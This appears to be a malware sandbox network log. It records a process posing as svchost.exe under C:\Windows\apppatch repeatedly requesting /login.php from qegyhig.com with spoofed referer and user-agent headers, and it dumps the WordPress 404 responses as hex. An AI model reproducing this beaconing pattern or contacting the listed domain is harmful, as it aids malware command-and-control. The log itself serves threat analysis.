                                                                                                                                                                                                          0192.168.2.949720188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:52:35 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC769INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:36 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T47TxWVx2O1M5cbssqArJpdhX7PwAwX6T2MVHPd6OO2G0G3sc9VfxLvf7i%2Bpttk5GXvDg%2BUPRmAUWVFCIp2TfkTiR%2BS%2Bj%2BSV8V44H42ml2Mp%2FnHmKOz5uk%2FuT%2FGWUA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb40c9d2c8c3c-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC600INData Raw: 37 63 62 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7cb0<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 20 66 6f 75 6e 64 20 2d 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74
                                                                                                                                                                                                          Data Ascii: found -</title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"ht
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74
                                                                                                                                                                                                          Data Ascii: eight),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 22 2c 65 2c 7b 6f 6e 63 65 3a 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63
                                                                                                                                                                                                          Data Ascii: ",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}c
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64
                                                                                                                                                                                                          Data Ascii: ss' href='https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-d
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65
                                                                                                                                                                                                          Data Ascii: ine-height:1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-he
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69
                                                                                                                                                                                                          Data Ascii: olor:#d10404;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-li
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 69 6d 65 6c 69 6e 65 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 6f 63 5f 5f 77 72 61 70 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 75 61 67 62 2d 74 61 78 6f 6d 6f 6e 79 2d 62 6f 78 20 61 2c 2e 61 73 74 2d 73 69 6e 67 6c 65 2d 70 6f 73 74 20 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 61 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 2e 77 70 2d 62 6c 6f 63 6b 2d 6c 61 74 65 73 74 2d 70 6f 73 74 73 20 3e 20 6c 69 20 3e 20 61 2c 2e 61 73 74 2d 73 69 6e
                                                                                                                                                                                                          Data Ascii: ,.ast-single-post .entry-content .uagb-timeline a,.ast-single-post .entry-content .uagb-toc__wrap a,.ast-single-post .entry-content .uagb-taxomony-box a,.ast-single-post .entry-content .woocommerce a,.entry-content .wp-block-latest-posts > li > a,.ast-sin
                                                                                                                                                                                                          2024-09-08 08:52:36 UTC1369INData Raw: 22 74 65 78 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 65 6d 61 69 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 75 72 6c 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 72 65 73 65 74 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 73 65 61 72 63 68 22 5d 3a 66 6f 63 75 73 2c 69 6e 70 75 74 5b 74 79 70 65 3d 22 6e 75 6d 62 65 72 22 5d 3a 66 6f 63 75 73 2c 74 65 78 74 61 72 65 61 3a 66 6f 63 75 73 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 69 6e 70 75 74 3a 66 6f 63 75 73 2c 5b 64 61 74 61 2d 73 65 63 74 69 6f 6e 3d 22 73 65 63 74 69 6f 6e 2d 68 65 61 64 65 72 2d 6d 6f 62 69 6c 65 2d
                                                                                                                                                                                                          Data Ascii: "text"]:focus,input[type="email"]:focus,input[type="url"]:focus,input[type="password"]:focus,input[type="reset"]:focus,input[type="search"]:focus,input[type="number"]:focus,textarea:focus,.wp-block-search__input:focus,[data-section="section-header-mobile-


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          1192.168.2.949722188.114.96.34431512C:\Windows\apppatch\svchost.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-09-08 08:52:38 UTC267OUTGET /login.php HTTP/1.1
                                                                                                                                                                                                          Referer: http://www.google.com
                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 2.0; Windows NT 5.0; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
                                                                                                                                                                                                          Host: qegyhig.com
                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC759INHTTP/1.1 404 Not Found
                                                                                                                                                                                                          Date: Sun, 08 Sep 2024 08:52:39 GMT
                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          vary: Accept-Encoding
                                                                                                                                                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                          link: <https://qegyhig.com/wp-json/>; rel="https://api.w.org/"
                                                                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B5uCX5xsqR1nBqM0Ng1KwQUjFByFqE2uKX%2BU7ovCRO50o3vth3IOc85p0nYztAHWSyWyocDzTAidxjdEHXrDknyCjDq6WTYS1wN1ztUSvqTTuXTXYo%2FLcM%2FaGKuIPw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                          CF-RAY: 8bfdb41b8afd4373-EWR
                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC610INData Raw: 37 63 62 61 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 20 0a 09 20 3c 73 74 79 6c 65 3e 0d 0a 23 77 70 61 64 6d 69 6e 62 61 72 20 23 77 70 2d 61 64 6d 69 6e 2d 62 61 72 2d 77 63 63 70 5f 66 72 65 65 5f 74 6f 70 5f 62 75 74 74 6f 6e 20 2e
                                                                                                                                                                                                          Data Ascii: 7cba<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="https://gmpg.org/xfn/11"> <style>#wpadminbar #wp-admin-bar-wccp_free_top_button .
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 6c 6f 63 61 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 5f 55 53 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 22 20 2f 3e 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6c 64 2b 6a 73 6f 6e 22 20 63 6c 61 73 73 3d 22 79 6f 61 73 74 2d 73 63 68 65 6d 61 2d 67 72 61 70 68 22 3e 7b 22 40 63 6f 6e 74 65 78 74 22 3a 22 68 74 74 70 73 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 22 2c 22 40 67 72 61 70 68 22 3a 5b 7b 22 40 74 79 70 65 22 3a 22 57 65 62 53 69 74 65 22 2c 22 40 69 64 22 3a 22 68 74 74 70 73 3a 2f 2f 71 65 67 79
                                                                                                                                                                                                          Data Ascii: title><meta property="og:locale" content="en_US" /><meta property="og:title" content="Page not found -" /><script type="application/ld+json" class="yoast-schema-graph">{"@context":"https://schema.org","@graph":[{"@type":"WebSite","@id":"https://qegy
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 2c 72 3d 28 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 6e 2c 30 2c 30 29 2c 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e 63 61 6e 76 61 73 2e 77 69 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2e 64 61 74 61 29 29 3b 72 65 74 75 72 6e 20 74 2e 65 76 65 72 79 28 66 75 6e
                                                                                                                                                                                                          Data Ascii: illText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(fun
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 21 30 7d 29 7d 29 2c 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 74 29 7b 76 61 72 20 6e 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 4a 53 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 28 6e 65 77 20 44 61 74 65 29 2e 76 61 6c 75 65 4f 66 28 29 3c 65 2e 74 69 6d 65 73 74 61 6d 70 2b 36 30 34 38 30 30 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 29 72 65 74 75 72 6e 20 65 2e 73 75 70 70 6f 72 74 54 65 73 74 73 7d 63 61 74 63 68 28 65 29 7b 7d 72
                                                                                                                                                                                                          Data Ascii: !0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}r
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 68 74 74 70 73 3a 2f 2f 71 65 67 79 68 69 67 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 61 73 74 72 61 2f 61 73 73 65 74 73 2f 63 73 73 2f 6d 69 6e 69 66 69 65 64 2f 6d 61 69 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 34 2e 33 2e 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 61 73 74 72 61 2d 74 68 65 6d 65 2d 63 73 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 3a 72 6f 6f 74 7b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 78 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 6c 67 2d 70 61 64 64 69 6e 67 3a 33 65 6d 3b 2d 2d 61 73 74 2d 63 6f 6e 74 61 69 6e 65 72 2d 64 65 66 61 75 6c 74 2d 73 6c 67
                                                                                                                                                                                                          Data Ascii: https://qegyhig.com/wp-content/themes/astra/assets/css/minified/main.min.css?ver=4.3.1' media='all' /><style id='astra-theme-css-inline-css'>:root{--ast-container-default-xlg-padding:3em;--ast-container-default-lg-padding:3em;--ast-container-default-slg
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 3a 31 2e 34 65 6d 3b 7d 68 32 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 33 32 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 35 65 6d 3b 7d 68 33 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 36 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 36 32 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 36 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d 3b 7d 68 34 2c 2e 65 6e 74 72 79 2d 63 6f 6e 74 65 6e 74 20 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 34 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 32 65 6d
                                                                                                                                                                                                          Data Ascii: :1.4em;}h2,.entry-content h2{font-size:32px;font-size:2rem;font-weight:600;line-height:1.25em;}h3,.entry-content h3{font-size:26px;font-size:1.625rem;font-weight:600;line-height:1.2em;}h4,.entry-content h4{font-size:24px;font-size:1.5rem;line-height:1.2em
                                                                                                                                                                                                          2024-09-08 08:52:39 UTC1369INData Raw: 30 34 3b 7d 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 70 72 65 76 69 6f 75 73 2c 2e 73 69 6e 67 6c 65 20 2e 6e 61 76 2d 6c 69 6e 6b 73 20 2e 6e 61 76 2d 6e 65 78 74 7b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 2a 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 35 3b 63 6f 6c 6f 72 3a 23 64 31 30 34 30 34 3b 7d 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 68 6f 76 65 72 20 2a 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 2c 2e 65 6e 74 72 79 2d 6d 65 74 61 20 61 3a 66 6f 63 75 73 20 2a 2c 2e 70 61 67 65 2d 6c 69 6e 6b 73 20 3e 20 2e 70 61 67 65 2d 6c 69 6e 6b 2c 2e 70 61 67 65 2d 6c
                                                                                                                                                                                                          Data Ascii: 04;}.single .nav-links .nav-previous,.single .nav-links .nav-next{color:#d10404;}.entry-meta,.entry-meta *{line-height:1.45;color:#d10404;}.entry-meta a:hover,.entry-meta a:hover *,.entry-meta a:focus,.entry-meta a:focus *,.page-links > .page-link,.page-l
